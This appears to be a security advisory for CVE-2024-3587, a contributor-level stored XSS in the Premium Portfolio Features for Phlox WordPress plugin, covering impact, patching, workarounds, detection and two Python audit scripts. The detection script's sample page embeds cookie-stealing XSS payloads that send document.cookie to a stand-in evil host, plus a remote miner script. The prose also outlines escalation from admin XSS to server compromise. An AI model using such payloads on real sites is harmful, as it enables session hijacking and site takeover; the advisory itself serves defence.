CVE-2024-3587
📋 TL;DR
This vulnerability allows authenticated WordPress users with contributor-level access or higher to store script in pages rendered by the Premium Portfolio Features for Phlox plugin: user-controlled values reach public/templates/elements/recent-portfolio.php (the element template named in the fixing changeset) without adequate escaping. The stored XSS executes in the browser of anyone who views the affected page. Because contributors cannot publish, the first viewer is typically the editor or administrator who reviews the pending post, which is exactly the privileged session an attacker wants to hijack. All WordPress sites running this plugin at version 2.3.2 or earlier are affected; version 2.3.3 fixes it.
💻 Affected Systems
- Premium Portfolio Features for Phlox (auxin-portfolio) WordPress plugin
📦 What is this software?
Premium Portfolio Features for Phlox (plugin slug auxin-portfolio) is a WordPress plugin that adds portfolio content and display elements, including the recent-portfolio element whose template is referenced below, to sites built on the Phlox theme.
⚠️ Risk & Real-World Impact
Worst Case
A payload that runs in an administrator's session can issue the same nonce-bearing requests the administrator can: create a new administrator account, edit theme or plugin PHP files, or upload a plugin. That turns the XSS into PHP execution on the web server, so the worst case is full compromise of the WordPress site and potentially the underlying host, with credential theft, backdoors, and redirection of visitors along the way.
Likely Case
Session hijacking, defacement of website pages, or injection of cryptocurrency miners or adware scripts affecting visitors.
If Mitigated
Where contributor accounts are few and trusted, and the site enforces a nonce- or hash-based Content Security Policy, impact is limited to defacement of the specific portfolio pages a contributor can touch, with minimal data exposure. Note that a CSP that allows 'unsafe-inline' (as many WordPress sites do to keep core and plugin inline scripts working) does not stop this class of payload.
🎯 Exploit Status
Exploitation requires an account at contributor level or above but is straightforward once authenticated: the attacker only needs to save a portfolio element whose attributes carry script. The vulnerable template line (recent-portfolio.php, line 179 in the 2.3.2 tag) and the fixing changeset are both public, so constructing a working payload does not require reverse engineering.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.3.3 or later
Fixing Changeset: https://plugins.trac.wordpress.org/changeset/3115537/auxin-portfolio/trunk/public/templates/elements/recent-portfolio.php
Restart Required: No (a plugin update takes effect on the next request)
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find the 'Premium Portfolio Features for Phlox' plugin.
4. Click 'Update Now' if an update is available.
5. Alternatively, download version 2.3.3 or later from the WordPress plugin repository and replace the plugin files.
🔧 Temporary Workarounds
Disable vulnerable plugin
Temporarily deactivate the auxin-portfolio plugin until patched. Portfolio elements will stop rendering while it is off, but the stored payload cannot execute through this template either.
wp plugin deactivate auxin-portfolio
Restrict user roles
Remove the contributor and author roles from untrusted users. Any role at contributor level or above can exploit this, so the real goal is to minimise the number of such accounts, not only the two roles named here. Removing a user's only role leaves the account with no capabilities at all; if the account should keep dashboard access, assign a lower role such as subscriber afterwards.
wp user remove-role <username> contributor
wp user remove-role <username> author
🧯 If You Can't Patch
- Implement Content Security Policy (CSP) headers to restrict script execution. Only a nonce- or hash-based policy without 'unsafe-inline' actually blocks injected inline script; expect to test it against WordPress core and other plugins, which commonly rely on inline scripts.
- Put a web application firewall (WAF) with XSS rules in front of wp-admin and admin-ajax.php so that the injection request itself is blocked. This is a detection and friction layer, not a fix: the payload is stored by an authenticated user through normal editing forms and can be encoded to evade signature rules.
🔍 How to Verify
Check if Vulnerable:
Check plugin version in WordPress admin under Plugins > Installed Plugins. If version is 2.3.2 or lower, you are vulnerable.
Check Version:
wp plugin get auxin-portfolio --field=version
Verify Fix Applied:
Confirm the reported version is 2.3.3 or higher, then load a page that contains a portfolio element to check that it still renders. Updating does not remove payloads that were already stored, so review existing portfolio elements created by contributor-level users after patching.
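The version check above is easy to get wrong when scripted, because a plain string comparison ranks "2.3.10" below "2.3.3". The following is an added example (not part of this advisory or of the plugin) that wraps the WP-CLI command from this section in a numeric comparison and walks a list of sites; for a multisite network the list would come from `wp site list --field=url`, and a plugin that is not installed makes `wp plugin get` exit non-zero. Only the comparison helpers are exercised offline; `installed_version` needs WP-CLI on the path.

```python
"""Audit one or more WordPress sites for auxin-portfolio < 2.3.3.

Added example for CVE-2024-3587; the fixed version is taken from the
advisory, the site list and output format are this script's own.
"""
import re
import subprocess
from typing import Dict, List, Optional

PLUGIN_SLUG = "auxin-portfolio"
FIXED_VERSION = "2.3.3"


def parse_version(version: str) -> List[int]:
    """Turn '2.3.2' into [2, 3, 2].

    Pre-release suffixes such as '-beta1' are dropped. Comparing integer
    lists avoids the lexical trap where '2.3.10' sorts before '2.3.3'.
    """
    numeric = re.match(r"[\d.]+", version.strip())
    if not numeric:
        raise ValueError(f"unparseable version string: {version!r}")
    return [int(part) for part in numeric.group(0).strip(".").split(".") if part]


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is older than the fixed release."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))          # pad so '2.3' compares as 2.3.0
    a += [0] * (width - len(a))
    b += [0] * (width - len(b))
    return a < b


def installed_version(site_url: Optional[str] = None) -> Optional[str]:
    """Ask WP-CLI for the plugin version; None if the plugin is absent.

    --url is WP-CLI's global flag for selecting a site on a multisite
    network. `wp plugin get` exits non-zero when the slug is not installed.
    """
    cmd = ["wp", "plugin", "get", PLUGIN_SLUG, "--field=version"]
    if site_url:
        cmd.append(f"--url={site_url}")
    result = subprocess.run(cmd, capture_output=True, text=True)
    if result.returncode != 0:
        return None
    return result.stdout.strip()


def classify(version: Optional[str]) -> str:
    """Map a version string (or None) to an audit status."""
    if version is None:
        return "not installed"
    return "vulnerable" if is_vulnerable(version) else "patched"


def audit_sites(site_urls: List[Optional[str]]) -> Dict[str, str]:
    """Return {site: status} for each site; use [None] for a single site."""
    return {url or "(single site)": classify(installed_version(url)) for url in site_urls}


if __name__ == "__main__":
    for site, status in audit_sites([None]).items():
        print(f"{site}: {status}")
```

Run it from the WordPress root (or anywhere WP-CLI can find the install via `--path`); a "vulnerable" line means the plugin is at 2.3.2 or earlier and should be updated or deactivated as described above.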
📡 Detection & Monitoring
Log Indicators:
- Portfolio elements or posts containing them created or edited by contributor-level users, especially edits that add markup or script to element attributes (requires an audit-log plugin; WordPress core does not log content changes)
- POST requests to wp-admin/post.php or wp-admin/admin-ajax.php from contributor accounts whose bodies carry script-like content, where a WAF or ModSecurity audit log records request bodies (plain web server access logs do not show payloads or whether an injection "failed")
Network Indicators:
- Unexpected script tags in portfolio page responses
- External script loads from portfolio pages
SIEM Query:
source="wordpress.log" AND "auxin-portfolio" AND ("update" OR "edit" OR "save") AND user_role="contributor"
(Illustrative Splunk-style query; the source name and the user_role field assume an audit-log plugin shipping WordPress events to the SIEM. Adjust the role filter to include author and editor, since any role at contributor level or above can exploit this.)
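The network indicators listed above (unexpected script tags and external script loads in portfolio page responses) can be checked mechanically. The script below is an added example, not part of this advisory or the plugin: it parses a fetched page with the standard-library HTML parser and reports inline script blocks, external script sources whose host is not on the site's allow-list, inline event-handler attributes, and `javascript:` URLs. The sample page is constructed for the example; its markup and the hostnames in it are hypothetical.

```python
"""Scan rendered HTML for script content a portfolio page should not carry.

Added example for CVE-2024-3587 detection. Feed it the body of an HTTP
response for a page that embeds a portfolio element and an allow-list of
hosts that legitimately serve scripts (the site itself, your CDN).
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlparse


class ScriptAuditor(HTMLParser):
    """Collects script-bearing constructs as {'kind': ..., 'detail': ...}."""

    def __init__(self, allowed_hosts: Set[str]) -> None:
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings: List[Dict[str, str]] = []
        self._in_inline_script = False
        self._script_buf: List[str] = []

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        attr_map = dict(attrs)
        if tag == "script":
            src = attr_map.get("src")
            if src:
                # Relative and same-origin sources have no host or an allowed
                # one; protocol-relative '//host/x' still yields a netloc.
                host = urlparse(src).netloc.lower()
                if host and host not in self.allowed_hosts:
                    self.findings.append({"kind": "external_script", "detail": src})
            else:
                self._in_inline_script = True
                self._script_buf = []
        for name, value in attrs:
            if value is None:
                continue
            # on* handlers (onerror, onload, onmouseover) are the usual
            # stored-XSS vector when a raw <script> tag is filtered.
            if name.lower().startswith("on"):
                self.findings.append({"kind": "event_handler", "detail": f"<{tag} {name}={value!r}>"})
            # javascript: URLs in href/src; low confidence, some themes use
            # javascript:void(0), but worth listing for review.
            if name.lower() in ("href", "src") and value.strip().lower().startswith("javascript:"):
                self.findings.append({"kind": "javascript_url", "detail": f"<{tag} {name}={value!r}>"})

    def handle_data(self, data: str) -> None:
        if self._in_inline_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag: str) -> None:
        if tag == "script" and self._in_inline_script:
            body = "".join(self._script_buf).strip()
            self.findings.append({"kind": "inline_script", "detail": body[:120]})
            self._in_inline_script = False


def audit_page(html: str, allowed_hosts: Set[str]) -> List[Dict[str, str]]:
    """Return every script-bearing construct not covered by the allow-list."""
    parser = ScriptAuditor(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample response: one legitimate theme script from the site's
# own host, plus four injected constructs of the kinds a stored XSS leaves.
SAMPLE_PAGE = """<!doctype html><html><head>
<script src="https://portfolio.example.com/wp-includes/js/jquery/jquery.min.js"></script>
</head><body>
<div class="portfolio">
  <h3>Spring Collection<script>document.location='https://evil.example.net/?c='+document.cookie</script></h3>
  <img src="x" alt="" onerror="fetch('https://evil.example.net/log?c='+document.cookie)">
  <a href="javascript:void(0)">more</a>
  <script src="//cdn.evil.example.net/miner.js"></script>
</div></body></html>"""

if __name__ == "__main__":
    for finding in audit_page(SAMPLE_PAGE, {"portfolio.example.com"}):
        print(f"{finding['kind']:16} {finding['detail']}")
```

In practice, fetch each portfolio page with the same cookies an editor would use (the payload may sit in a pending, unpublished post), diff the findings against a baseline taken from a known-clean page of the same template, and treat any new inline script or off-list host as a trigger for reviewing recent contributor edits.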
🔗 References
- https://plugins.trac.wordpress.org/browser/auxin-portfolio/tags/2.3.2/public/templates/elements/recent-portfolio.php#L179
- https://plugins.trac.wordpress.org/changeset/3115537/auxin-portfolio/trunk/public/templates/elements/recent-portfolio.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b0ea041b-f09d-4c62-aada-26afbc60b6f2?source=cve